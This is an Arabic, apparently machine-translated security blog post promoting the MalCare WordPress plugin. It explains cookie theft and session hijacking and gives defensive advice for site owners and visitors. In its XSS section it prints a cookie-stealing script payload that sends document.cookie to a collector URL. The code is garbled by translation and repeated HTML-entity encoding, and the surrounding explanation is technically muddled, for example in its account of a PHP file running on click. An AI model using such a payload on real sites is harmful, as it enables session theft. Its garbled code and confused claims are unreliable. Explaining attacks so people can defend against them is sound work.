كيف تمنع جلسات سرقة ملفات تعريف الارتباط واختطافها؟ (دليل أسهل)

هل تعلم أن موقع الويب الخاص بك يستخدم ملفات تعريف الارتباط لتخزين البيانات السرية؟ هل تعلم أن المتسللين يمكنهم بسهولة سرقة ملفات تعريف الارتباط الخاصة بك؟ هذا يمكن أن يعرض موقع الويب الخاص بك والزائرين للخطر!

تخزن ملفات تعريف الارتباط جميع أنواع المعلومات - من تفضيلات الإعلانات الخاصة بالعميل إلى بيانات اعتماد تسجيل الدخول ومعلومات بطاقة الائتمان. تُستخدم ملفات تعريف الارتباط على نطاق واسع عبر الإنترنت ومن المخيف عدد مرات سرقتها.

إذا كنت ضحية لسرقة ملفات تعريف الارتباط أو اختطاف جلسة ، فإن تداعيات ذلك ستكون وخيمة. لا تخسر فقط الإيرادات وثقة الزائرين ولكن قد تواجه أيضًا مشكلات قانونية وغرامات باهظة!

لكن لا داعي للقلق لأننا سنأخذك اليوم في جولة حول كل ما تحتاج إلى معرفته لمنع هذه الهجمات!

في هذا الدليل ، سنتعرف أولاً على كيفية سرقة المخترقين لملفات تعريف الارتباط ، ثم سننتقل إلى الإجراءات الوقائية.

TL ؛ DR : هل أنت قلق بشأن موقع WordPress الخاص بك؟ يمكنك تأمين موقعك الآن عن طريق تثبيت البرنامج الإضافي للحماية من سرقة الجلسة وملفات تعريف الارتباط . سيقوم بفحص موقع الويب الخاص بك بانتظام وينبهك إذا قام أحد المتطفلين بحقن أي كود خبيث سيمكنهم من سرقة ملفات تعريف الارتباط. باستخدام البرنامج المساعد ، يمكنك تنظيف الاختراق على الفور وتجنب التداعيات.

قائمة المحتويات

→ ما هي سرقة ملفات تعريف الارتباط؟

→ كيف يستخدم المخترقون البرمجة النصية عبر المواقع (XSS) لسرقة ملفات تعريف الارتباط وجلسات الاختطاف؟

→ كيف تمنع سرقة ملفات تعريف الارتباط واختطاف الجلسة؟

→ الخطوات التي يمكن لزوار الموقع اتخاذها ضد سرقة ملفات تعريف الارتباط

ما هي سرقة ملفات تعريف الارتباط؟

بقدر ما نتمنى ، فإن سرقة ملفات تعريف الارتباط ليست بسيطة مثل وضع طفل يده في وعاء بسكويت! إنها عملية معقدة ولفهم ما يحدث ، نحتاج إلى التطرق إلى الأساسيات.

→ ما هو ملف تعريف الارتباط؟

يمكنك التفكير في ملفات تعريف الارتباط على أنها أجزاء صغيرة من البيانات. يخزن معلومات حول تفاعلك مع موقع ويب. على سبيل المثال ، يرغب موقع التجارة الإلكترونية في تتبع رحلة العميل - المنتجات التي تم البحث عنها ، أو المنتجات المشتراة ، أو العناصر التي تم التخلي عنها في سلة التسوق ، أو الصفحات التي يزورونها.

يمنح هذا المتجر معلومات تحليلية حول ما يفضله العملاء ، والصفحات التي يتم زيارتها أكثر من غيرها ، ومدة بقاء المستخدمين على الصفحة ، وما إلى ذلك. يمكنهم بعد ذلك استخدام هذه المعلومات لتخصيص ما يتم عرضه على موقع الويب وفقًا لتفضيلات العميل.

تمنح ملفات تعريف الارتباط مالكي مواقع الويب نظرة ثاقبة لما يصلح وما لا يصلح. يساعدهم هذا في تحديد ما يحتاجون إلى تغييره أو تحسينه على موقعهم.

تُستخدم ملفات تعريف الارتباط أيضًا لعرض الإعلانات ذات الصلة للمستخدمين. عند زيارة مواقع الويب ، ستلاحظ عرض الإعلانات.

عادة ما تعكس هذه الإعلانات تاريخ البحث الأخير الخاص بك. على سبيل المثال ، إذا بحثت عن "أجهزة كمبيوتر محمولة" على Google ، فستلاحظ أن الإعلانات على جميع مواقع الويب تعرض لك إعلانات لشركة Dell. هذه الإعلانات ليست جزءًا من موقع الويب ولكن يتم التعامل معها بواسطة خدمات مثل Google Adsense.

تجعل ملفات تعريف الارتباط الأمور مريحة لكل من مالك موقع الويب والمستخدم. يمكن أن يعزز المشاركة ويؤدي إلى المزيد من المبيعات وهو أمر رائع لأصحاب مواقع الويب. بالنسبة للمشتري ، تساعدهم ملفات تعريف الارتباط في الحصول على تجربة أكثر تخصيصًا على موقع الويب أو مشاهدة إعلانات أكثر صلة.

ولكن هناك الكثير من العيوب التي سنناقشها لاحقًا.

[العودة إلى الأعلى ↑ ]

→ ما هي جلسة المتصفح ومعرف الجلسة؟

عندما تقوم بتسجيل الدخول إلى موقع ويب ، يتم إنشاء جلسة بين جهاز الكمبيوتر الخاص بك وهذا الموقع.

على سبيل المثال ، عند تسجيل الدخول إلى Facebook ، تبدأ جلسة. يتيح لك ذلك الاستمرار في استخدام Facebook (حتى إذا أغلقت متصفح الويب وأعدت فتحه) حتى تنقر على "تسجيل الخروج" وتنهي الجلسة.

إذا لم يتم إنشاء الجلسة ، فستحتاج إلى الاستمرار في تسجيل الدخول في كل مرة تريد بيانات جديدة. على سبيل المثال ، إذا أردت ترك موجز أخبار Facebook الخاص بك وعرض صفحة ملف تعريف أحد الأصدقاء ، فسيتم تسجيل خروجك من Facebook وستحتاج إلى إدخال بيانات الاعتماد الخاصة بك مرة أخرى لتسجيل الدخول وعرض ملف تعريف الصديق.

هذا هو سبب الحاجة إلى الجلسات. إنه يبقيك مسجلاً للدخول حتى تتمكن من الاستمرار في تصفح صفحات الويب المختلفة والتنقل في موقع الويب.

المهم أن نلاحظ هنا أن كل جلسة تنشئ مجموعة من ملفات تعريف الارتباط. يمكننا استدعاء ملفات تعريف الارتباط هذه للجلسة. ولكل ملف تعريف ارتباط جلسة معرف جلسة فريد.

يستخدم موقع الويب هذا المعرف لمصادقة المستخدم وإنشاء اتصال موثوق به.

على سبيل المثال ، لتسجيل الدخول إلى Facebook ، تحتاج إلى إدخال اسم المستخدم وكلمة المرور الخاصين بك. بعد ذلك ، يتم إنشاء جلسة بمعرف فريد. ستتم مصادقة أي طلبات تقدمها إلى موقع Facebook باستخدام هذا المعرف. لذلك ، عندما تريد عرض صفحة مختلفة ، فإنك ترسل طلبًا إلى خادم Facebook لعرض تلك الصفحة. يتحقق Facebook من المعرف ويعرض المحتوى الذي ترغب في رؤيته.

الآن ، يمكن للقراصنة اختطاف جلستك وإساءة استخدام هذا الاتصال الموثوق به. يمكنهم إرسال طلبات ضارة نيابة عنك. دعونا نرى كيف.

[العودة إلى الأعلى ↑ ]

→ ما هي المخاوف الأمنية المتعلقة بملفات تعريف الارتباط؟

عندما يتم إنشاء ملفات تعريف الارتباط ، يمكن فقط لك - مالك الموقع عرضها. لا يوجد موقع آخر يمكنه عرض ملفات تعريف الارتباط الخاصة بك. هم ينتمون لك وحدك.

لكن ملفات تعريف الارتباط هذه تنتقل عبر الإنترنت. يتم استخدامها بواسطة خدمات الإعلانات وخدمات التحليل. لذا فإن ملفات تعريف الارتباط هذه ترتد من خادم إلى خادم في جميع أنحاء العالم. إذا كان الاتصال غير آمن ، فيمكن للمتطفلين اعتراض ملفات تعريف الارتباط هذه وسرقتها بسهولة.

الآن ، قد تعتقد أنه إذا تمكن أحد المتطفلين من الحصول على معلومات حول تفضيلات التسوق الخاصة بك ، فهذا أمر مهم ، أليس كذلك؟

تكمن المشكلة في تخزين ملفات تعريف الارتباط أكثر من مجرد معلومات حول تفضيلات التسوق الخاصة بك. كما أنه يخزن التفاصيل المصرفية والمعلومات الشخصية مثل عنوان الشحن وتفاصيل الاتصال.

إذا وقع هذا النوع من المعلومات في الأيدي الخطأ ، فيمكن إساءة استخدامه في أنشطة احتيالية.

واحدة من أكثر الطرق شيوعًا لسرقة المتسللين لملفات تعريف الارتباط هي إذا كانوا يستخدمون نفس شبكة wifi مثلك. يسمى هذا النوع من اختراق شبكات wifi بهجمات man-in-the-middle ويمكن أن يحدث فقط إذا كان كلاهما متصلاً بنفس الشبكة اللاسلكية. هذا هو السبب في أنه يُنصح بعدم استخدام شبكة wifi العامة غير الآمنة أو المستخدمة من قبل الكثيرين. يمكن أن يحدث هذا أيضًا للمستخدمين داخل نفس شبكات الكمبيوتر.

تتضمن بعض الطرق الأخرى استنشاق الحزم وباستغلال ثغرة أمنية تسمى البرمجة النصية عبر المواقع. اليوم ، سوف نوضح لك بالتفصيل كيف تعمل سرقة ملفات تعريف الارتباط XSS.

[العودة إلى الأعلى ↑ ]

كيف يستخدم المخترقون البرمجة النصية عبر المواقع (XSS) لسرقة ملفات تعريف الارتباط وجلسات الاختطاف؟

لنوضح لك كيف يسرق المتسللون ملفات تعريف الارتباط باستخدام هجمات البرمجة النصية عبر المواقع (XSS) ، سنستخدم مثالاً. لنفترض أنك تقوم بزيارة موقع ويب يحتوي على قسم للتعليقات عليه.

سيتم إرسال أي تعليق تقوم به إلى قاعدة بيانات الموقع. من الناحية المثالية ، يجب تكوين قسم التعليقات هذا لقبول النص المكتوب باللغة الإنجليزية فقط. ولكن إذا قبلت الأحرف الخاصة أيضًا ، فهذا يجعلها عرضة لـ XSS.

يمكن للمتسلل إدخال أكواده الضارة الخاصة به والتي سيتم إرسالها إلى قاعدة البيانات. بمجرد الدخول ، سيتم تنفيذ الكود. هناك العديد من الأكواد التي يمكن للمتسللين إدخالها في موقع الويب لتشغيل جميع أنواع الأنشطة الضارة مثل إنشاء مسؤول موقع ويب جديد أو سرقة ملفات تعريف الارتباط.

لسرقة ملفات تعريف الارتباط ، يمكن للمتسلل إدخال الكود التالي:

ملاحظة: هذا ليس برنامجًا تعليميًا حول كيفية سرقة ملفات تعريف الارتباط. تهدف هذه المقالة إلى توعية مالكي مواقع الويب بكيفية سرقة المتسللين لملفات تعريف الارتباط. لا ننصحك بالقيام بأي أنشطة غير قانونية.

[بي أتش بي]

document.write ('& amp ؛ amp ؛ amp ؛ amp ؛ amp ؛ amp ؛ amp ؛ lt ؛ img src = & amp ؛ amp ؛ amp ؛ amp ؛ amp ؛ amp؛ amp؛ quot؛ http: //localhost/submitcookie.php؟ cookie = '

+ escape (document.cookie) + '& amp؛ amp؛ amp؛ amp؛ amp؛ amp؛ amp؛ amp؛ quot؛ / & أمبير ؛ أمبير ؛ أمبير ؛ أمبير ؛ أمبير ؛ أمبير ؛ أمبير ؛ أمبير ؛ أمبير ؛ أمبير ؛ GT ؛) ؛

[/بي أتش بي]

في قسم التعليقات ، سيظهر هذا الرمز كصورة. إذا قمت (كزائر) بالنقر فوقها ، فسترى صورة معروضة. لكن هناك أكثر من مجرد حدث.

عند النقر فوق الصورة ، ينفذ ملف PHP هذا الرمز بصمت ويحصل على ملف تعريف ارتباط الجلسة ومعرف الجلسة.

الآن يمكن للمخترق إعادة إنشاء الجلسة الخاصة بك والظهور على هذا الموقع. يمكنهم تنفيذ العديد من الأعمال الخبيثة. على سبيل المثال ، إذا كان ملف تعريف الارتباط الخاص بك يحتوي على بطاقة الائتمان الخاصة بك أو أي معلومات دفع أخرى ، فيمكنهم إجراء عمليات شراء.

لحسن الحظ ، هناك تدابير وقائية لحماية مالكي مواقع الويب وزوارها من هذه الاختراقات.

[ss_click_to_tweet tweet = ”لا تنقر مطلقًا على الروابط المشبوهة في قسم التعليقات في مواقع الويب وفي رسائل البريد الإلكتروني. يمكن أن تصبح ضحية لسرقة ملفات تعريف الارتباط ". content = "لا تنقر أبدًا على الروابط المشبوهة في قسم التعليقات في مواقع الويب وفي رسائل البريد الإلكتروني. يمكن أن تصبح ضحية لسرقة ملفات تعريف الارتباط ". النمط = "افتراضي"]

[العودة إلى الأعلى ↑ ]

كيفية منع سرقة ملفات تعريف الارتباط واختطاف الجلسة؟

هناك طرفان يلعبان دورًا في منع سرقة ملفات تعريف الارتباط واختطاف الجلسة - مالك موقع الويب والزائر. سنناقش الإجراءات الوقائية لكلا الجانبين.

← الإجراءات التي يمكن لمالكي مواقع الويب اتخاذها ضد سرقة ملفات تعريف الارتباط

بصفتك مالكًا لموقع الويب ، إذا لم يكن لديك محلل أمني للتعامل مع كل ذلك نيابة عنك ، فأنت بحاجة إلى تنفيذ الإجراءات الوقائية التالية:

1. قم بتثبيت شهادة SSL

يتم نقل البيانات باستمرار بين متصفح المستخدم وخادم الويب الخاص بك. بدون SSL ، يتم إرسال هذه البيانات (ملفات تعريف الارتباط) بنص عادي. إذا اعترض أحد المتطفلين هذه البيانات ، فيمكنه ببساطة قراءتها. لذلك إذا كانت تحتوي على بيانات اعتماد تسجيل الدخول ، فسيتم كشفها.

تقوم طبقة المقابس الآمنة (SSL) بتشفير البيانات قبل نقلها. لذلك حتى إذا تمكن أحد المتسللين من سرقتها ، فلن يتمكنوا من قراءة البيانات.

يمكنك الحصول على شهادة SSL من خلال شركة استضافة الويب الخاصة بك أو من مزود SSL. يمكنك أيضًا الحصول على شهادة SSL أساسية مجانية من Let's Encrypt.

2. تثبيت البرنامج المساعد للأمان

احتفظ بمكوِّن إضافي للأمان في WordPress مثل MalCare نشطًا على موقع الويب الخاص بك. سيمنع جدار حماية المكون الإضافي محاولات الاختراق على موقع الويب الخاص بك ويحظر عناوين IP الضارة. بالإضافة إلى ذلك ، سوف يفحص موقعك بانتظام وينبهك إذا تم إدخال أي شفرة ضارة بواسطة متسلل. يمكنك تنظيف موقع الويب الخاص بك على الفور. سيساعدك هذا في اكتشاف محاولات الاختراق هذه وحذفها على الفور قبل أن تتسبب في أي ضرر.

3. قم بتحديث موقع الويب الخاص بك

حافظ دائمًا على تحديث موقع الويب الخاص بك ، وهذا يشمل تثبيت WordPress والسمات والمكونات الإضافية. يعمل التشغيل على برامج قديمة على فتح العديد من النقاط الضعيفة على موقع الويب الخاص بك والتي يمكن للقراصنة استغلالها. تأكد من تحديث موقعك عندما يتوفر تحديث جديد.

لا تحمل هذه التحديثات ميزات جديدة وإصلاحات للأخطاء فحسب ، ولكنها تعمل أيضًا على إصلاح الثغرات الأمنية من وقت لآخر.

4. صلّب موقع الويب الخاص بك

يوصي WordPress.org ببعض إجراءات تقوية مواقع الويب التي يجب عليك تنفيذها على موقع الويب الخاص بك. يتضمن ذلك استخدام أسماء مستخدمين قوية وفريدة من نوعها وكلمات مرور قوية ، وحظر تنفيذ PHP في مجلدات غير معروفة ، وتعطيل محرر الملفات في السمات والإضافات والمزيد. الآن ، قد يبدو كل هذا مثل المصطلحات اللغوية بالنسبة لك ، لذلك أنشأنا دليلًا تفصيليًا خطوة بخطوة لتقوية WordPress يمكنك اتباعه.

[العودة إلى الأعلى ↑ ]

الخطوات التي يمكن أن يتخذها زوار الموقع ضد سرقة ملفات تعريف الارتباط

بصفتك زائرًا لموقع الويب ، لا يتعين عليك الوثوق بشكل أعمى في أن مواقع الويب قد اتخذت إجراءات أمنية مناسبة. يمكنك حماية نفسك ببروتوكولات أمان الويب التالية.

1. قم بتثبيت مضاد فيروسات فعال

تأكد من تثبيت برنامج مكافحة البرامج الضارة على الجهاز الذي تستخدمه للوصول إلى الإنترنت. سينبهك هذا إذا تم اكتشاف برامج ضارة عند زيارة موقع ويب ضار. سيؤدي أيضًا إلى إزالة أي برامج ضارة قد تقوم بتنزيلها أو تثبيتها عن طريق الخطأ على نظامك.

2. لا تنقر أبدًا على الروابط المشبوهة

يستهدف المتسللون المستخدمين من خلال قسم التعليقات على مواقع الويب وعبر رسائل البريد الإلكتروني. تجنب النقر فوق الروابط غير الموثوق بها خاصة تلك التي تجذبك بعروض أو خصومات جذابة.

3. تجنب تخزين البيانات الحساسة

يجعل تخزين معلومات بطاقة الائتمان على مواقع التسوق عملية الدفع أسرع وأكثر ملاءمة. إن حفظ كلمات المرور على متصفحات الويب مثل Google Chrome لتسجيل الدخول تلقائيًا إلى مواقع الويب يلغي الحاجة إلى تذكر كلمات المرور!

لكن كل ذلك يأتي مع مخاطر عالية للسرقة. من الأفضل عدم تخزين البيانات الحساسة على مواقع الويب مطلقًا. قد يوفر عليك بضع ثوانٍ ، لكنه يعرضك أيضًا لخطر التعرض للهجوم.

4. امسح ملفات تعريف الارتباط

يمكنك مسح ملفات تعريف الارتباط بانتظام للتخلص من أي معلومات حساسة مخزنة في متصفحات مثل Google Chrome. سجل الوصول> مسح محفوظات الاستعراض. هنا ، حدد مربع الاختيار "ملفات تعريف الارتباط وبيانات الموقع الأخرى".

اختر النطاق الزمني "كل الأوقات" أو النطاق الذي يناسبك. بعد ذلك ، انقر فوق "مسح البيانات" وسيتم حذف ملفات تعريف الارتباط من محفوظات متصفحك.

هذا يقودنا إلى إنهاء سرقة ملفات تعريف الارتباط. نأمل أن تساعدك هذه المقالة في الحصول على فهم أفضل لما يحدث بالضبط وكيفية منعه.

[ss_click_to_tweet tweet = ”ساعدني هذا الدليل من MalCare في فهم سرقة ملفات تعريف الارتباط وكيفية اتخاذ الإجراءات الوقائية ضدها. تحقق من ذلك." content = "ساعدني هذا الدليل من MalCare في فهم سرقة ملفات تعريف الارتباط وكيفية اتخاذ الإجراءات الوقائية ضدها. تحقق من ذلك." النمط = "افتراضي"]

[العودة إلى الأعلى ↑ ]

افكار اخيرة

بصفتك مالكًا لموقع الويب ، فأنت بحاجة إلى اتخاذ تدابير وقائية لتأمين مصالحك الخاصة وكذلك زوارك وعملائك وعملائك. لكننا نتفهم أن إنشاء موقع ويب وإدارته مهمة صعبة.

هناك عدد لا حصر له من الأشياء التي يجب الاهتمام بها وهذا هو السبب في أن أمان WordPress يميل إلى اتخاذ المقعد الخلفي عدة مرات.

لكن تجاهل الجانب الأمني ​​لموقعك على الويب يمكن أن يكون كارثيًا لجميع جهودك الأخرى.

الحل السهل والسريع والفعال هو المكون الإضافي MalCare للأمان. يمكنك التفكير في الأمر على أنه حارس أمن تقوم بتعيينه. سيعمل على مدار الساعة لفحص موقع الويب الخاص بك بانتظام وحمايته من الهجمات. يمكنك أن تطمئن إلى أن موقع الويب الخاص بك في أيد أمينة.

حافظ على حماية موقع WordPress الخاص بك مع MalCare !